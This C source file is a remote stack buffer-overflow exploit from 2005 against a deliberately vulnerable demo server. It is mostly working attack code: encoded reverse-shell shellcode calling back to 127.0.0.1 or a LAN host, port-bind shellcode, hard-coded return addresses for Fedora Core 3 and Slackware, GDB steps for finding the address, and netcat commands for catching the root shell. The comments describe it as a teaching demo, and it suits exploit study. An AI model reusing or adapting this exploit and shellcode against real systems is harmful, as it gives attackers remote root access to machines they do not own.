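/** ========================================================
    My remote demo exploit v1.4, BOF Vulnerable Server
    by Hugo Martin  www.hackcraft.com (2005)
    ========================================================
    Tested on: Fedora Core 3, Slackware v10.1

    > Run the Server (with root)
      Server#> ./vulnserversp 8888
      HM: get_sp: 0xbffff718

    > Run the listener needed to receive the shell (If used Shellcode :4321)
      client1> nc -lp 4321
      id

    > Run my exploit
      client2> ./rxvulnerable localhost 8888
      =================================================================
       ./vulnserversp Demo Remote BOF Exploit
       by Hugo Martin [ www.hackcraft.com ]
      =================================================================
      RET: 0xbffff5e8
      BUF: 1063
      Shellcode Length: 96

    > If the exploit is successful this will appear automagically:
      client1> nc -lp 4321
      id
      uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

    Review notes (2005-era code, read before reusing):
      - RET is a hard-coded stack address; it is only meaningful on a target
        without stack randomisation (the systems listed above). On any kernel
        with ASLR the value has to be recovered per run, and this demo cannot.
      - The active reverse shellcode was generated with LHOST=127.0.0.1, so the
        listener must run on the target host itself (matching the "localhost"
        example above). For a remote listener regenerate the payload; the
        commented-out "scode" below is the same payload built for
        172.16.100.24.
      - The original distribution lost the header names from its #include
        lines; the set below is what the code actually needs.
**/

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
 * Reverse shellcode, you have to do "$nc -lp 4321" to wait for the reverse shell.
 * linux_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=96 Encoder=PexFnstenvSub http://metasploit.com
 *
 * NOTE: sizeof(shellcode) is 97, not 96 -- the array carries the implicit
 * terminating NUL of the string literal. build_payload() accounts for that.
 */
unsigned char shellcode[] =
    "\x33\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa7"
    "\x86\x26\xeb\x83\xeb\xfc\xe2\xf4\x96\x5d\x75\xa8\xf4\xec\x24\x81"
    "\xc1\xde\xaf\x0a\x6a\x06\xb5\xb2\x17\xb9\xeb\x6b\xee\xff\xdf\xb0"
    "\xfd\xee\x59\xeb\xa7\x87\x40\x83\xb7\x67\x65\x8d\xf4\x0f\xc7\x5b"
    "\xc1\xd6\x77\xb8\x2e\x67\x65\x26\x27\xd4\x4e\xc4\x88\xf5\x4e\x83"
    "\x88\xe4\x4f\x85\x2e\x65\x74\xb8\x2e\x67\x96\xe0\x6a\x06\x26\xeb";

/*
 * Alternative payload, same generator, for a listener on a LAN host:
 * linux_ia32_reverse - LHOST=172.16.100.24 LPORT=4321 Size=96 Encoder=PexFnstenvSub http://metasploit.com
 *
 * unsigned char scode[] =
 *     "\x33\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa7"
 *     "\x86\x26\xeb\x83\xeb\xfc\xe2\xf4\x96\x5d\x75\xa8\xf4\xec\x24\x81"
 *     "\xc1\xde\xaf\x0a\x6a\x06\xb5\xb2\x17\xb9\xeb\x6b\xee\xff\xdf\xb0"
 *     "\xfd\xee\x8a\xfb\xc3\x9e\x40\x83\xb7\x67\x65\x8d\xf4\x0f\xc7\x5b"
 *     "\xc1\xd6\x77\xb8\x2e\x67\x65\x26\x27\xd4\x4e\xc4\x88\xf5\x4e\x83"
 *     "\x88\xe4\x4f\x85\x2e\x65\x74\xb8\x2e\x67\x96\xe0\x6a\x06\x26\xeb";
 */

/*
 * Alternative payload: port-bind shellcode listening on [0.0.0.0:44800].
 * If you swap this in, connect with "nc -vv <target> 44800" instead of
 * running a listener. It is longer than the reverse payload (166 bytes, no
 * encoder); build_payload() places it by sizeof, so the layout still works.
 *
 * char shellcode[] =
 *     "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1"
 *     "\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd"
 *     "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xaf\x66\x89\x46\x0e\x8d\x46\x0c\x89"
 *     "\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb"
 *     "\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89"
 *     "\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
 *     "\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06"
 *     "\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
 *     "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd"
 *     "\x80\xe8\x5b\xff\xff\xff";
 */

/*
 * RET: the address the overwritten saved EIP is pointed at. You will most
 * likely need to adjust it (use GDB):
 *   - attach to the running server:  # gdb vulnerablesp PID
 *     (get PID with:  # ps -ef | grep vulnerablesp)
 *   - find RET with:  gdb> x/200bx $esp-200   and locate the start of the NOP sled.
 *
 * Known values:
 *   Fedora Core 3   : 0xbffff790
 *   Slackware v10.1 : 0xbffff5e8  OR  0xbffff620
 *   other           : 0xbffff7b0
 *
 * Whatever you pick must not contain a 0x00 byte: the server treats the
 * payload as a C string and a NUL would truncate it before the saved EIP.
 */
#define RET 0xbffff5e8   /* OR 0xbffff620 -- Slackware 10.1 */

/*
 * Payload layout (offsets into the buffer sent to the server).
 * These numbers are the exploit's contract with the vulnerable server's
 * 1024-byte stack buffer; do not change them without re-deriving the layout.
 */
enum {
    PAYLOAD_LEN   = 1064,   /* bytes on the wire, including the final NUL          */
    SHELLCODE_END = 1001,   /* shellcode bytes end just before this offset          */
    RET_FIRST     = 1022,   /* first offset overwritten with RET                   */
    RET_LIMIT     = 1059,   /* RET is written at every 4th offset below this limit */
    RET_WIDTH     = 4       /* ia32 pointer size                                   */
};

/*
 * Fill buf (exactly PAYLOAD_LEN bytes) with the exploit string:
 *
 *   [NOP sled][shellcode ending at 1000][NOPs][RET x10 from 1022][NOP][NUL]
 *
 * The resulting bytes are identical to the original hand-written layout; the
 * NOP that used to patch over the shellcode's copied NUL is now avoided by
 * simply not copying the NUL. RET is written with memcpy rather than through
 * an (int *) cast, which at offset 1022 was an unaligned, aliasing-violating
 * store. The value lands in the exploit host's byte order, as before; both
 * ends are ia32 in the documented setup.
 */
static void build_payload(char *buf)
{
    const size_t sc_len = sizeof(shellcode) - 1;   /* drop the literal's NUL */
    const uint32_t ret = RET;
    int i;

    /* NOP sled everywhere we do not explicitly overwrite */
    memset(buf, 0x90, PAYLOAD_LEN);

    /* shellcode, placed so its last byte is at SHELLCODE_END - 1 */
    memcpy(buf + SHELLCODE_END - sc_len, shellcode, sc_len);

    /* repeated return address: offsets 1022, 1026, ..., 1058 (last copy ends at 1061) */
    for (i = RET_FIRST; i < RET_LIMIT; i += RET_WIDTH) {
        memcpy(buf + i, &ret, RET_WIDTH);
    }

    /* terminate so the server's string handling stops exactly here */
    buf[PAYLOAD_LEN - 1] = '\0';
}

/*
 * Resolve hostname:portstr and open a TCP connection to it.
 * Returns a connected socket, or -1 after printing a diagnostic to stderr.
 * The port is validated (1..65535, no trailing junk) instead of being fed
 * through atoi(), which silently yields 0 on garbage.
 * gethostbyname() is obsolete (getaddrinfo is the modern replacement) but is
 * kept to stay faithful to the original tool's behaviour.
 */
static int connect_target(const char *hostname, const char *portstr)
{
    struct sockaddr_in remote;
    struct hostent *host;
    char *end = NULL;
    long port;
    int s;

    errno = 0;
    port = strtol(portstr, &end, 10);
    if (end == portstr || *end != '\0' || errno == ERANGE || port < 1 || port > 65535) {
        fprintf(stderr, "Invalid port %s \n", portstr);
        return -1;
    }

    host = gethostbyname(hostname);
    if (host == NULL) {
        fprintf(stderr, "Unknown Host %s \n", hostname);
        return -1;
    }
    /* we only build an AF_INET sockaddr, so refuse anything else up front */
    if (host->h_addrtype != AF_INET || host->h_length != (int)sizeof(struct in_addr)
        || host->h_addr_list[0] == NULL) {
        fprintf(stderr, "Unknown Host %s \n", hostname);
        return -1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        fprintf(stderr, "Error: Socket \n");
        return -1;
    }

    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    memcpy(&remote.sin_addr, host->h_addr_list[0], sizeof(struct in_addr));
    remote.sin_port = htons((uint16_t)port);

    if (connect(s, (struct sockaddr *)&remote, sizeof(remote)) == -1) {
        close(s);
        fprintf(stderr, "Error: connect \n");
        return -1;
    }
    return s;
}

/*
 * Entry point: ./rxvulnerable <target-ip> <port>
 * Builds the payload, sends it in one shot, and prints the parameters used so
 * the operator can compare them with the server's get_sp output.
 * Exit status: 0 on a completed send, -1 on any error (as the original).
 */
int main(int argc, char *argv[])
{
    char buffer[PAYLOAD_LEN];   /* 1024 bytes of server buffer + enough to own EIP */
    ssize_t sent;
    int s;

    printf("=================================================================\n");
    printf(" ./vulnserversp Demo Remote BOF Exploit \n");
    printf(" by Hugo Martin [ www.hackcraft.com ] \n");
    printf("=================================================================\n\n");

    if (argc != 3) {
        printf("Usage: %s target-ip port \n", argv[0]);
        return -1;
    }

    build_payload(buffer);

    s = connect_target(argv[1], argv[2]);
    if (s < 0) {
        return -1;
    }

    /* the whole buffer, including the trailing NUL, goes on the wire */
    sent = send(s, buffer, sizeof(buffer), 0);
    if (sent == -1) {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }
    if (sent != (ssize_t)sizeof(buffer)) {
        /* a short send means the saved EIP was probably never reached */
        close(s);
        fprintf(stderr, "sending data failed: short send\n");
        return -1;
    }
    close(s);

    printf("RET: 0x%x\n", RET);
    /* strlen() stops at the single NUL we placed at offset 1063 */
    printf("BUF: %zu\n", strlen(buffer));
    printf("Shellcode Length: %zu\n\n", strlen((const char *)shellcode));

    printf("-> If used: Reverse shellcode [0.0.0.0:4321]\n");
    printf("   -> You should now be able to type commands in your $nc -lp 4321 terminal. \n\n");
    printf("-> If used: Special Port Bind shellcode [0.0.0.0:44800]\n");
    printf("   -> If everything went ok, to get a shell you should now type: \n");
    printf("   -> $ nc -vv %s 44800   OR \n", argv[1]);
    printf("   -> $ telnet %s 44800 \n\n", argv[1]);

    return 0;
}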